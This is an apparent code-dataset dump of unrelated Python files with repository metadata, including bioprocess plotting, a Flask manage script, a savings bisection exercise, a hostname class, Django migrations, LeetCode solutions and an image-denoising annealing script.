_ = lns4 = ax.plot(t_exp_bat ,C_exp_bat[:,1],'^',color = "green", markersize = 6,label = 'Cs experimental')
ax2 = ax.twinx()
_ = lns5 = ax2.plot(t_bat,C_otim_bat[:,2],linestyle = ":", color = "blue",linewidth = 3,label = 'Cp modelo')
_ = lns6 = ax2.plot(t_exp_bat,C_exp_bat[:,2],'s',color = "blue", markersize = 6,label = 'Cp experimental')
_ = ax.set_xlabel('Tempo de cultivo (h)',weight='bold')
_ = ax.set_ylabel('Cx e Cs (g/L)', weight='bold')
_ = ax2.set_ylabel('Cp (g/L)', weight='bold')
lns = lns1+lns2+lns3+lns4+lns5+lns6
labs = [l.get_label() for l in lns]
_ = ax.legend(lns, labs, loc='upper center', bbox_to_anchor=(0.5, 1.17),ncol=3, fancybox=True, shadow=True)
_ = ax.grid(True)
_ = f.set_figheight(9)
_ = f.set_figwidth(14)
_ = f.patch.set_facecolor('white')
_ = plt.style.use('default')
# Definindo a figura que será gerada - batelada alimentada:
tam_graf()
_ = f = plt.figure()
_ = ax = f.add_subplot(111)
_ = lns1 = ax.plot(t_alim,C_otim_alim[:,0], color = "red", linewidth = 3,label ='Cx modelo')
_ = lns2 = ax.plot(t_exp_alim,C_exp_alim[:,0],'o',color = "red",markersize = 6, label = 'Cx experimental')
_ = lns3 = ax.plot(t_alim,C_otim_alim[:,1], linestyle="--", color = "green",linewidth = 3,label = 'Cs modelo')
_ = lns4 = ax.plot(t_exp_alim,C_exp_alim[:,1],'^',color = "green", markersize = 6,label = 'Cs experimental')
ax2 = ax.twinx()
_ = lns5 = ax2.plot(t_alim,C_otim_alim[:,2],linestyle = ":", color = "blue",linewidth = 3,label = 'Cp modelo')
_ = lns6 = ax2.plot(t_exp_alim,C_exp_alim[:,2],'s',color = "blue", markersize = 6,label = 'Cp experimental')
_ = ax.set_xlabel('Tempo de cultivo (h)',weight='bold')
_ = ax.set_ylabel('Cx e Cs (g/L)', weight='bold')
_ = ax2.set_ylabel('Cp (g/L)', weight='bold')
lns = lns1+lns2+lns3+lns4+lns5+lns6
labs = [l.get_label() for l in lns]
_ = ax.legend(lns, labs, loc='upper center', bbox_to_anchor=(0.5, 1.17),ncol=3, fancybox=True, shadow=True)
_ = ax.grid(True)
_ = f.set_figheight(9)
_ = f.set_figwidth(14)
_ = f.patch.set_facecolor('white')
_ = plt.style.use('default')
# Definindo a figura que será gerada - processos acoplados:
tam_graf()
_ = f = plt.figure()
_ = ax = f.add_subplot(111)
_ = lns1 = ax.plot(t_bat,C_otim_bat[:,0], color = "red", linewidth = 3,label ='Cx modelo')
_ = lns2 = ax.plot(t_exp_bat,C_exp_bat[:,0],'o',color = "red",markersize = 6, label = 'Cx experimental')
_ = lns3 = ax.plot(t_bat,C_otim_bat[:,1], linestyle="--", color = "green",linewidth = 3,label = 'Cs modelo')
_ = lns4 = ax.plot(t_exp_bat ,C_exp_bat[:,1],'^',color = "green", markersize = 6,label = 'Cs experimental')
ax2 = ax.twinx()
_ = lns5 = ax2.plot(t_bat,C_otim_bat[:,2],linestyle = ":", color = "blue",linewidth = 3,label = 'Cp modelo')
_ = lns6 = ax2.plot(t_exp_bat,C_exp_bat[:,2],'s',color = "blue", markersize = 6,label = 'Cp experimental')
_ = ax.set_xlabel('Tempo de cultivo (h)',weight='bold')
_ = ax.set_ylabel('Cx e Cs (g/L)', weight='bold')
_ = ax2.set_ylabel('Cp (g/L)', weight='bold')
lns = lns1+lns2+lns3+lns4+lns5+lns6
labs = [l.get_label() for l in lns]
_ = ax.legend(lns, labs, loc='upper center', bbox_to_anchor=(0.5, 1.17),ncol=3, fancybox=True, shadow=True)
_ = ax.grid(True)
_ = f.set_figheight(9)
_ = f.set_figwidth(14)
_ = f.patch.set_facecolor('white')
_ = plt.style.use('default')
# Definindo a figura que será gerada - batelada alimentada:
tam_graf()
_ = f = plt.figure()
_ = ax = f.add_subplot(111)
_ = lns1 = ax.plot(Ttotal,Cx, color = "red", linewidth = 3,label ='Cx modelo')
_ = lns2 = ax.plot(Ttotal_exp,Cx_exp,'o',color = "red",markersize = 6, label = 'Cx experimental')
_ = lns3 = ax.plot(Ttotal,Cs, linestyle=":", color = "blue",linewidth = 3,label = 'Cs modelo')
_ = lns4 = ax.plot(Ttotal_exp,Cs_exp,'s',color = "blue", markersize = 6,label = 'Cs experimental')
ax2 = ax.twinx()
_ = lns5 = ax2.plot(Ttotal,Cp,linestyle = "--", color = "green",linewidth = 3,label = 'Cp modelo')
_ = lns6 = ax2.plot(Ttotal_exp,Cp_exp,'^',color = "green", markersize = 6,label = 'Cp experimental')
_ = ax.axvline(x = dad_entr_geral[0][6], color = "grey", linestyle="dashed", linewidth=3)
_ = ax.set_xlabel('Tempo de cultivo (h)',weight='bold')
_ = ax.set_ylabel('Cx e Cs (g/L)', weight='bold')
_ = ax2.set_ylabel('Cp (g/L)', weight='bold')
lns = lns1 + lns2 + lns3 + lns4 + lns5 + lns6
labs = [l.get_label() for l in lns]
_ = ax.legend(lns, labs, loc='upper center', bbox_to_anchor=(0.5, 1.17),ncol=3, fancybox=True, shadow=True)
_ = ax.grid(True)
_ = f.set_figheight(9)
_ = f.set_figwidth(14)
_ = f.patch.set_facecolor('white')
_ = plt.style.use('default')
## Cálculo produtividade volumétrica modelo e experimental - celular e do produto:
Px_exp = Cx_exp[1:]/Ttotal_exp[1:]
Pp_exp = Cp_exp[1:]/Ttotal_exp[1:]
Px = Cx[1:]/Ttotal[1:]
Pp = Cp[1:]/Ttotal[1:]
## Plotando a figura gráfica - produtividades:
tam_graf()
f = plt.figure()
ax = f.add_subplot(111)
lns1 = ax.plot(Ttotal[1:] ,Px,'red',linewidth=3,label='Produtividade Celular modelo')
lns2 = ax.plot(Ttotal_exp[1:] ,Px_exp,'or',markersize=6, label='Produtividade Celular experimental')
ax2 = ax.twinx()
lns3 = ax2.plot(Ttotal[1:],Pp,linestyle=":", color='blue',linewidth=3,label='Produtividade do Produto modelo')
lns4 = ax2.plot(Ttotal_exp[1:],Pp_exp,'sb', markersize=6,label='Produtividade do Produto experimental')
ax.set_xlabel('Tempo de cultivo (h)',weight='bold')
ax.set_ylabel('Produtividade Celular (gx/L.h)', weight='bold')
ax2.set_ylabel('Produtividade Produto (gp/L.h)', weight='bold')
lns = lns1+lns2+lns3+lns4
labs = [l.get_label() for l in lns]
ax.legend(lns, labs, loc='upper center', bbox_to_anchor=(0.5, 1.19),ncol=2, fancybox=True, shadow=True )
ax.grid(True)
f.set_figheight(9)
f.set_figwidth(14)
f.patch.set_facecolor('white')
plt.style.use('default')
plt.show()
#Equação que permite calcular a produtividade específica (Ppx) modelo e experimental:
Ppx_exp = Cp_exp*(1/Cx_exp)
Ppx_exp[Ppx_exp<0] = 0
Ppx = Cp*(1/Cx)
Ppx[Ppx<0] = 0
## Plotando a figura gráfica - produtividade específica:
tam_graf()
f = plt.figure()
ax = f.add_subplot(111)
plt.plot(Ttotal,Ppx,'red',linewidth=3, label='Modelo')
plt.plot(Ttotal_exp,Ppx_exp,'or',markersize=6, label='Experimental')
plt.xlabel('Tempo de cultivo (h)',weight='bold')
plt.ylabel('Produtividade Específica (gp/gx)', weight='bold')
plt.legend(loc='upper center', bbox_to_anchor=(0.5, 1.17),ncol=2, fancybox=True, shadow=True )
plt.grid(True)
f.set_figheight(9)
f.set_figwidth(14)
f.patch.set_facecolor('white')
plt.style.use('default')
plt.show()
# Calculando a velocidade de crescimento microbiano - experimental e modelada:
#imprimindo os valores dos parâmetros
#param_otim = np.asarray(resultado_alm_alim)
#Calculando os valores de mi - modelo otimizado e experimental
mimaximo_otim = resultado_alm_alim[0][0]
Ks_otim = resultado_alm_alim[0][1]
m_otim = resultado_alm_alim[0][5]
Cx_estr_otim = resultado_alm_alim[0][6]
mi_exp = mimaximo_otim*((Cs_exp/(Ks_otim + Cs_exp))*((1-(Cx_exp/Cx_estr_otim))**m_otim))
mi_exp[mi_exp<0] = 0
mi = mimaximo_otim*((Cs/(Ks_otim + Cs))*((1-(Cx/Cx_estr_otim))**m_otim))
mi[mi<0] = 0
## Plotando a figura gráfica - taxa específica de crescimento microbiano:
tam_graf()
f = plt.figure()
ax = f.add_subplot(111)
plt.plot(Ttotal,mi,'red',linewidth=3, label='Modelo')
plt.plot(Ttotal_exp,mi_exp,'or',markersize=6, label='Experimental')
plt.xlabel('Tempo de cultivo (h)',weight='bold')
plt.ylabel('Taxa $\mu(h^{-1}$)', weight='bold')
plt.legend(loc='upper center', bbox_to_anchor=(0.5, 1.17),ncol=2, fancybox=True, shadow=True )
plt.grid(True)
f.set_figheight(9)
f.set_figwidth(14)
f.patch.set_facecolor('white')
plt.style.use('default')
plt.show()
|
[
"noreply@github.com"
] |
BrunaAQ.noreply@github.com
|
2d3c42d80962b8ac92822559e4ee520b78fc17e7
|
534f2777f413ddd1179c959d370fd8aaaa70b615
|
/manage.py
|
44936832baf7941595ad04e4ddfbfa639e9cf628
|
[] |
no_license
|
cnf/MarkedImp
|
363ccee61a9f4311cfd2b7ac37ee5053882d434c
|
5518c62174c57ac6392ac80cf56e16b022b5f7e5
|
refs/heads/master
| 2020-12-24T15:22:12.447719
| 2012-05-29T20:26:00
| 2012-05-29T20:26:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 961
|
py
|
#!/usr/bin/env python
from flaskext.script import Manager, prompt_bool
from marked import app
# import fixtures as _fixtures
from marked.database import init_db
import os
manager = Manager(app)
@manager.shell
def make_shell_context():
from marked import models
return dict(app=app, mod=models)
@manager.command
def newdb():
"""Deletes the database, and creates a new empty one."""
if prompt_bool("Are you sure you want to lose all your data"):
try:
os.remove('test.db')
except OSError:
print "Database did not exist"
init_db()
# @manager.command
# def test():
# """docstring for tests"""
# from unittest import TestLoader, TextTestRunner
# cur_dir = os.path.dirname(os.path.abspath(__file__))
# loader = TestLoader()
# test_suite = loader.discover(cur_dir)
# runner = TextTestRunner(verbosity=2)
# runner.run(test_suite)
if __name__ == "__main__":
manager.run()
|
[
"frank.rosquin@gmail.com"
] |
frank.rosquin@gmail.com
|
90fdd31968443ff7eb5b493e7141dd22fae266ee
|
9cbee0c3fbc22172d38d28f18e24c37a4c9e7eee
|
/ps1c.py
|
fa4d2b9200fcda048be1abfafb406bc526e1c9bd
|
[] |
no_license
|
samconstans/wwcode_mit_spring2017
|
7ffa4e475f394dada60853b56e92a0b3c0d6efd8
|
44de041f5cd689f09b3b8ab420361d8cf3286cd5
|
refs/heads/master
| 2021-01-19T12:08:54.531748
| 2017-05-24T10:09:31
| 2017-05-24T10:09:31
| 88,020,522
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,168
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 24 13:26:07 2017
@author: Анастасия
"""
annual_salary = int(input('Enter your starting annual salary:'))
down_payment = 250000.0
error = 100
semi_annual_raise = 0.07
r = 0.04
all_months = 36
left = 0
right = 10000
saving_rate = 0.0
steps = 0
while left + 1 < right:
portion_saved =int((left+right)/2)
current_savings = 0.0
monthly_salary = annual_salary / 12
for month in range(1, all_months+1):
current_savings += (current_savings * r) / 12 + (
portion_saved/10000 * monthly_salary)
if month % 6 == 0:
monthly_salary += monthly_salary * semi_annual_raise
steps += 1
difference = current_savings - down_payment
if 0.0 <= difference < error:
saving_rate =(left + right)/2
break
elif difference < 0:
left = portion_saved
elif difference > error:
right = portion_saved
saving_rate = saving_rate/10000
if 0.0 < saving_rate < 1:
print('Best savings rate:', saving_rate)
print('Steps in bisection search:', steps)
else:
    print('It is not possible to pay the down payment in three years.')
|
[
"nastia-vovk@ukr.net"
] |
nastia-vovk@ukr.net
|
ecddf43835fc02570ec7293ef59cf49e0c1c47f9
|
916de4fe646dc8e6dea4afb07e928633fed4687d
|
/nettool/hostname.py
|
0353882dce3623d0dfe3690bad8c5d235ecdcf5f
|
[
"MIT"
] |
permissive
|
dirkakrid/nettool
|
b96f83fbc98f6d537083814ebe06df0f629e93d5
|
378a58da2bc405d6dd0c5bcead4b35427c0778a1
|
refs/heads/master
| 2021-01-21T15:42:54.144014
| 2016-05-13T07:06:22
| 2016-05-13T07:06:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,127
|
py
|
# -*- coding: utf-8 -*-
# import ipaddress
from nettool.address.ipv4address import IPv4Address
from nettool.nettest import NetTest as nu
class Hostname(object):
def __init__(self, name=None, ip=None):
if name is None and ip is None:
raise ValueError('Must specify a name or ip')
if isinstance(ip, basestring) and not ip.strip():
ip = None
if ip is None and nu.validate.ip(name):
self.ip = name
name = None
else:
self.ip = ip
self._initialize_name(name)
def _initialize_name(self, value):
self.domain = ''
if nu.validate.ip(value):
message = 'Invalid hostname \'{}\'. Hostname cannot be an IP address'.format(value)
raise ValueError(message)
if isinstance(value, basestring):
if '.' in value.strip('.'):
parts = value.split('.')
name = parts.pop(0)
nu.validate.host(name)
self.name = name
self.domain = '.'.join(parts)
else:
self.name = value
elif value is None:
self.name = None
else:
message = "Invalid type used in Name initilization: '{}'.".format(type(value).__name__)
raise TypeError(message)
# def _initialize_ip(self, value):
# self.ip = value
@staticmethod
def _build_fqdn(hostname, domain):
fqdn = ''
if hostname is None:
return None
if len(domain) > 0:
fqdn = '.'.join([hostname, domain])
else:
fqdn = hostname
return fqdn
@staticmethod
def _clean_base(value):
return value.lower()
@staticmethod
def _clean_fqdn(value):
return Hostname._clean_base(value).strip('.')
@staticmethod
def _clean_domain(value):
return Hostname._clean_base(value).strip('.')
@staticmethod
def _clean_name(value):
return Hostname._clean_base(value)
@property
def fqdn(self):
return self._build_fqdn(self.name, self.domain)
@property
def name(self):
if not hasattr(self, '_name'):
self._name = None
return self._name
@name.setter
def name(self, value):
if value is None:
value = None
else:
value = Hostname._clean_name(value)
if not nu.validate.host(value):
if nu.validate.hostname(value):
domain = '.'.join(value.split('.')[1:])
value = value.split('.')[0]
nu.validate.host(value, raise_exception=True)
self.domain = domain
else:
nu.validate.host(value, raise_exception=True)
self._name = value
@property
def domain(self):
return self._domain
@domain.setter
def domain(self, value):
if value is not None and self.name is not None:
value = Hostname._clean_domain(value)
nu.validate.hostname(self._build_fqdn(self.name, value), raise_exception=True)
self._domain = value
@property
def ip(self):
address = self._ip
if isinstance(address, IPv4Address):
address = address.exploded
return address
@ip.setter
def ip(self, value):
if value is None:
value = None
else:
nu.validate.ip(value, raise_exception=True)
if not isinstance(value, IPv4Address):
value = IPv4Address(value)
self._ip = value
def __str__(self):
hostname = Hostname._build_fqdn(self.name, self.domain)
ip = self.ip or ''
hostname = hostname or ip
if hostname == ip:
ip = ''
hostname = '{} {}'.format(hostname, ip).strip()
return hostname
def __repr__(self):
hostname = Hostname._build_fqdn(self.name, self.domain)
if hostname is None:
hostname = 'Unknown'
ip = ''
if self.ip:
ip = ' {}'.format(self.ip)
return '<Host {}{}>'.format(hostname, ip)
def _string_equality(self, value):
try:
ip = IPv4Address(value)
return ip == self.ip
except ValueError:
pass
if '.' in value.rstrip('.'):
value = Hostname._clean_fqdn(value)
return value == self.fqdn
else:
value = Hostname._clean_name(value)
return value == self.name
return False
def __eq__(self, value):
if isinstance(value, basestring):
return self._string_equality(value)
elif isinstance(value, Hostname):
if self.domain and value.domain:
if self.fqdn == value.fqdn:
return True
else:
if self.name == value.name:
return True
if self.ip and self.ip == value.ip:
return True
return False
def __ne__(self, value):
return not self.__eq__(value)
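# --- Added illustrative sketch (not part of the original module): typical use of the
# --- class above, with made-up host/IP values.  Requires the nettool package (Python 2).
# host = Hostname('web01.example.com', ip='192.0.2.10')
# host.name    -> 'web01'
# host.domain  -> 'example.com'
# host.fqdn    -> 'web01.example.com'
# host == '192.0.2.10'   -> True, because equality also matches on the stored IP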
|
[
"glencharmon@gmail.com"
] |
glencharmon@gmail.com
|
0528f183fd22997fff41c8d1a3a520f182da6500
|
83bbd8a625d25eca5176e3f74edf293ab0eaec52
|
/produksi/migrations/0037_transisi_user.py
|
f36285aebc377e8d26175385bc44afd9858eb744
|
[] |
no_license
|
dimasrizqi/simfutami
|
1256ba1d064183c84e0ea60b7e41b9f9fb03086a
|
ea2c6309aab739e600bac9e25a8ce3083351f955
|
refs/heads/master
| 2020-04-23T03:21:39.940856
| 2019-04-12T00:30:20
| 2019-04-12T00:30:20
| 170,876,004
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 615
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.20 on 2019-04-07 14:05
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('produksi', '0036_remove_transisi_update_time'),
]
operations = [
migrations.AddField(
model_name='transisi',
name='user',
field=models.ForeignKey(default='1', on_delete=django.db.models.deletion.CASCADE, to='produksi.user'),
preserve_default=False,
),
]
|
[
"dimasrizqi@Jhonny.local"
] |
dimasrizqi@Jhonny.local
|
619d39f280fe2348eecace2659e44c6bf767d8f9
|
b1dd2d0f777404633790589776bcabaf9e0c94c0
|
/company/migrations/0012_internshipapplieddb.py
|
d3d299776c26756dda795574919a18d14c1e9e8d
|
[] |
no_license
|
BItishree/InternshipRecommendation
|
93ba38777271c12d752453bbf9bcb0de7ca46e18
|
c6cad5ad1f5a84b236e65f85bd257b5b55a6f9c5
|
refs/heads/master
| 2023-05-06T08:09:00.044493
| 2021-06-03T13:18:11
| 2021-06-03T13:18:11
| 373,477,955
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 623
|
py
|
# Generated by Django 3.1.7 on 2021-04-14 11:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('company', '0011_internship_apply_by'),
]
operations = [
migrations.CreateModel(
name='InternshipAppliedDB',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('internship_id', models.IntegerField()),
('student_id', models.IntegerField()),
('status', models.CharField(default='pending', max_length=30)),
],
),
]
|
[
"56443929+BItishree@users.noreply.github.com"
] |
56443929+BItishree@users.noreply.github.com
|
0c0a8d0dc3afe1db01d8470f909b4f3489a52720
|
1a19b0129770c3f60b8a6af39c708dd9075a61ae
|
/DiceDropOne.py
|
01f722dacce4dba3bbd53a936a5082c5a1fbd8d9
|
[] |
no_license
|
Iampineapple/Little-Mathematical-Problems
|
643875c933abbc31a70dee0bbd71817eac13f4bf
|
944ce13dbd73d0c249f1dba8dda11d6e9e5c22d4
|
refs/heads/master
| 2020-12-24T13:44:20.387265
| 2015-08-16T20:01:41
| 2015-08-16T20:01:41
| 40,141,225
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,482
|
py
|
#!/usr/bin/env python
#made by Cory on 18 Aug 2014
#This program will take ndp (as in, n dice with p sides on each die)
#and calculates the average of ndp, drop the lowest
#We do this by summing up all the possible die combinations,
#and then dividing by the number of die combinations
#This function checks if we've incremented a die's value beyond the possible values
#If so, it sets the die back to one, increments the next die, and checks if that
#die's value has gone beyond the possible values
def checkforoverflow(array, index, p):
if array[index] > p:
array[index] = 1
array[index+1] +=1
checkforoverflow(array, index+1, p)
return
import math
#Ask the user for some input, set indexarray as our array of dice,
#and set the total to zero. Indexarray contains one more entry than the number of dice-
#when the final item is incremented to two, we've gone through all the permutations
print "Let's calculate the average of ndp, drop the lowest !"
n = int(raw_input('What is n ? (How many dice do we have ?)'))
p = int(raw_input('What is p ? (How many sides does each die have ?)'))
indexarray = [1]*(n+1)
averagetotal = 0
#Check all the permutations, adding their value to averagetotal, and checking for overflow
while indexarray[n] < 2:
averagetotal += sum(indexarray[0:n]) - min(indexarray[0:n])
indexarray[0] += 1
checkforoverflow(indexarray, 0, p)
average = averagetotal / float(p**n)
print "The average was ", average
|
[
"kori.haight@gmail.com"
] |
kori.haight@gmail.com
|
371d6010629dada431dc7b327500474c445e4d21
|
61fd46efd8efc8af52604ef977a4fe0802c9d566
|
/journal/migrations/0021_auto_20180415_1122.py
|
db3019ba31bbff7c774df437f078b854cd2a7c23
|
[] |
no_license
|
zrmartin/WebApp
|
daf035f2dc4baf9b0baab18c1bb47c656de1491f
|
fe76ad2d9fea25939b3826711015efd5c961c7fa
|
refs/heads/master
| 2021-05-09T21:07:57.372652
| 2018-07-12T17:43:50
| 2018-07-12T17:43:50
| 118,720,246
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 492
|
py
|
# Generated by Django 2.0.1 on 2018-04-15 19:22
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('journal', '0020_auto_20180414_1940'),
]
operations = [
migrations.AlterField(
model_name='concert',
name='venue',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='venue', to='journal.Venue'),
),
]
|
[
"zrmartin@calpoly.edu"
] |
zrmartin@calpoly.edu
|
00dc56be07011f9c0232bff19be22aef55335885
|
70cb2608ed49589f08f2bef04cf4d3b7f5aef2c1
|
/Python/model_Dummy_regroup.py
|
6bae7b657de85a7d48b4b8d20f65a8fd1ba529c5
|
[] |
no_license
|
Rav830/DiscussionTrackerCollaboration-LREC2020
|
b61180fc8a915bf9c7500b4a2267fb125c0efc7f
|
af20cf0079e4416ecd9aaf7ae2e085a6a5ee0616
|
refs/heads/master
| 2022-06-02T10:08:38.910707
| 2020-05-05T21:53:50
| 2020-05-05T21:53:50
| 223,023,383
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,094
|
py
|
import config
tee = config.Tee('../Results/%s/Dummy%s%s_regroup_model.txt' % (config.args.dataset, config.args.tf_idf, config.args.remove_non), 'w')
from header_model_data import *
from sklearn.dummy import DummyClassifier
print("Regrouping the labels")
for i in range(len(yDF)):
if(yDF[i] != pr.y_conversion('new-idea')):
yDF[i] = pr.y_conversion('Non')
print("The Class Distribution is:")
classDist = Counter(yDF)
for k in classDist.keys():
print("\t"+str(pr.conversion_y(k))+":"+str(classDist[k]))
print("Defining and doing a dummy classifier again set to predict based on the class distribution")
dumDum = DummyClassifier(strategy='stratified', random_state=None, constant = None)
scores = cross_validate(dumDum, xDF, yDF, cv=logo, scoring = scorer)
#print(scores)
#print("Accuracy: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std() * 2))
compute_stats(originalclass, predictedclass, True)
print("Confusion Matrix")
print_cm(confusion_matrix(originalclass, predictedclass, labels = list(range(2))), [pr.conversion_y(x) for x in range(2)])
tee.close()
|
[
"ravneetsingh830@gmail.com"
] |
ravneetsingh830@gmail.com
|
27618d86d240c352487bc98038672bf9b88f2853
|
f9dd12b580207cbd7387a6fd2506175f284c96f2
|
/160-Intersection of Tow Linked Lists.py
|
7d79ed26581d5803be8238b9a941d8a563e9cc70
|
[] |
no_license
|
Damon0626/Leetcode-
|
c2e8ced0f2e6da3d3116aa33415bca691bb57217
|
0fb8fa7d9ef65bee816a8aa35326b975d6fb7844
|
refs/heads/master
| 2020-04-03T03:05:00.090478
| 2019-04-15T15:10:05
| 2019-04-15T15:10:05
| 154,976,056
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,435
|
py
|
# -*-coding:utf-8-*-
# @Author: Damon0626
# @Time : 19-4-9 10:09 PM
# @Email : wwymsn@163.com
# @Software: PyCharm
'''
Write a program to find the node at which the intersection of two singly linked lists begins.
For example, the following two linked lists:
begin to intersect at node c1.
Example 1:
Input: intersectVal = 8, listA = [4,1,8,4,5], listB = [5,0,1,8,4,5], skipA = 2, skipB = 3
Output: Reference of the node with value = 8
Input Explanation: The intersected node's value is 8 (note that this must not be 0 if the two lists intersect). From the head of A, it reads as [4,1,8,4,5]. From the head of B, it reads as [5,0,1,8,4,5]. There are 2 nodes before the intersected node in A; There are 3 nodes before the intersected node in B.
Example 2:
Input: intersectVal = 2, listA = [0,9,1,2,4], listB = [3,2,4], skipA = 3, skipB = 1
Output: Reference of the node with value = 2
Input Explanation: The intersected node's value is 2 (note that this must not be 0 if the two lists intersect). From the head of A, it reads as [0,9,1,2,4]. From the head of B, it reads as [3,2,4]. There are 3 nodes before the intersected node in A; There are 1 node before the intersected node in B.
Example 3:
Input: intersectVal = 0, listA = [2,6,4], listB = [1,5], skipA = 3, skipB = 2
Output: null
Input Explanation: From the head of A, it reads as [2,6,4]. From the head of B, it reads as [1,5]. Since the two lists do not intersect, intersectVal must be 0, while skipA and skipB can be arbitrary values.
Explanation: The two lists do not intersect, so return null.
Notes:
If the two linked lists have no intersection at all, return null.
The linked lists must retain their original structure after the function returns.
You may assume there are no cycles anywhere in the entire linked structure.
Your code should preferably run in O(n) time and use only O(1) memory.
'''
''' Two-pointer trick: when a pointer reaches the end of its list it jumps to the other list's head, so both traverse A + B = B + A; the first node where the two pointers coincide is the intersection point. '''
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
class Solution(object):
def getIntersectionNode(self, headA, headB):
"""
:type head1, head1: ListNode
:rtype: ListNode
"""
if not headA or not headB:
return None
pa = headA
pb = headB
while pa != pb:
pa = headB if not pa else pa.next
pb = headA if not pb else pb.next
return pa
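# --- Added illustrative check (not part of the original solution): build two lists that
# --- share the tail 8 -> 4 -> 5 (as in Example 1) and verify the shared node is returned.
if __name__ == '__main__':
    common = ListNode(8)
    common.next = ListNode(4)
    common.next.next = ListNode(5)
    head_a = ListNode(4)
    head_a.next = ListNode(1)
    head_a.next.next = common
    head_b = ListNode(5)
    head_b.next = ListNode(0)
    head_b.next.next = ListNode(1)
    head_b.next.next.next = common
    assert Solution().getIntersectionNode(head_a, head_b) is common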
|
[
"2404448093@qq.com"
] |
2404448093@qq.com
|
b0924b59c0c9b65d85d8a024b94bb2563bfa590f
|
693d42b5891560ce301dc02335d2ebca9cca60bd
|
/String Reduction.py
|
991288b044b2200ea435a80a4de8ca76fd09d2f9
|
[] |
no_license
|
jananisairam/Hackerrank-Solved-Programs
|
37e6caeedf626399e1a4874aa45f4e7db7ea3ba7
|
8155d0aa9b3150dce5f70f70c2e85e45c69a1305
|
refs/heads/master
| 2021-01-18T17:52:32.932116
| 2017-04-02T12:56:11
| 2017-04-02T12:56:11
| 86,821,554
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 634
|
py
|
from collections import deque
def stringReduction(a):
queue = deque([a])
min_length = len(a)
while queue:
a = queue.popleft()
if len(a) < min_length:
min_length = len(a)
for i in range(len(a)-1):
substring = a[i:(i+2)]
if substring == "ab" or substring == "ba":
queue.append(a[:i] + "c" + a[(i+2):])
elif substring == "bc" or substring == "cb":
queue.append(a[:i] + "a" + a[(i+2):])
elif substring == "ac" or substring == "ca":
queue.append(a[:i] + "b" + a[(i+2):])
return min_length
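# --- Added illustrative check (not part of the original snippet): "cab" can only be
# --- reduced once, e.g. "cab" -> "bb" or "cc", so the minimum length is 2.
if __name__ == '__main__':
    print(stringReduction("cab"))  # expected output: 2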
|
[
"noreply@github.com"
] |
jananisairam.noreply@github.com
|
9dcb2ba52e5b69c9e273e4abb9b53b12f2a9053f
|
972762e02b2a2c93b6421644c2336d472ca38dcc
|
/alternative.py
|
514488fc5e6adfc02cf44cddbe834894a90f9bd2
|
[] |
no_license
|
nicolas1805961/Markov-chain-image-denoising
|
b622f797dce92d9c4b2fbc543585073d7cfba0cd
|
eb276fa478dd3586d0b70a24812cd2550a45ffbf
|
refs/heads/master
| 2023-02-16T21:03:32.620432
| 2021-01-15T20:35:40
| 2021-01-15T20:35:40
| 310,937,012
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,718
|
py
|
# To add a new cell, type '# %%'
# To add a new markdown cell, type '# %% [markdown]'
# %%
from skimage.io import imread
import numpy as np
import matplotlib.pyplot as plt
image = imread('peppers.jpg')
fig, ax = plt.subplots(1, 1, figsize=(10, 10))
ax.imshow(image)
# %%
from skimage.color import rgb2gray
image = rgb2gray(image)
fig, ax = plt.subplots(1, 1, figsize=(10, 10))
ax.imshow(image, cmap='gray')
# %%
from numpy.linalg import norm
def get_ratio(candidate, x, y, i, j):
regularizer = norm(x[i, j] - x[i - 1, j]) + norm(x[i, j] - x[i + 1, j]) + norm(x[i, j] - x[i, j - 1]) + norm(x[i, j] - x[i, j + 1])
data_consistency = norm(x[i, j] - y[i, j])
u_denominator = 1 * data_consistency + 0 * regularizer
regularizer = norm(candidate - x[i - 1, j]) + norm(candidate - x[i + 1, j]) + norm(candidate - x[i, j - 1]) + norm(candidate - x[i, j + 1])
data_consistency = norm(candidate - y[i, j])
u_numerator = 1 * data_consistency + 0 * regularizer
#return np.exp(-u_numerator) / np.exp(-u_denominator)
return u_denominator - u_numerator
# %%
def update_temp(r):
return np.power(0.99, np.exp(8 * r))
# %%
from numpy.random import rand, randint
h = image.shape[0]
w = image.shape[1]
x = rand(h, w)
y = image
T = 4
count = 0
iterations = 10000000
for iter in range(iterations):
row = randint(1, h - 1)
col = randint(1, w - 1)
candidate = rand()
value = get_ratio(candidate, x, y, row, col)
#p = min(1, value)
p = np.exp(min(0, value) / T)
if rand() < p:
count += 1
x[row, col] = candidate
T *= update_temp(iter / iterations)
print(count)
fig, ax = plt.subplots(1, 1, figsize=(10, 10))
ax.imshow(x, cmap='gray')
# %%
|
[
"nicolasportal92@gmail.com"
] |
nicolasportal92@gmail.com
|
d8c1a0c3c78c52141206c624cab6d5f68155c424
|
0be960f5e7d443698f5fa26a23dd2259c5c8ad05
|
/1清洗数据.py
|
5b180529836b4c7272c2a2123dc7e41258779f01
|
[] |
no_license
|
102757017/lstm-multi
|
e88f129f43f5bc1317e6c7b38fdd239c95cef57f
|
eeb4074a9416af6f567854e082ba1dd6f0e98a18
|
refs/heads/master
| 2022-07-09T23:12:02.310606
| 2020-09-06T15:17:07
| 2020-09-06T15:17:07
| 126,478,981
| 12
| 3
| null | 2022-06-22T03:48:45
| 2018-03-23T11:58:21
|
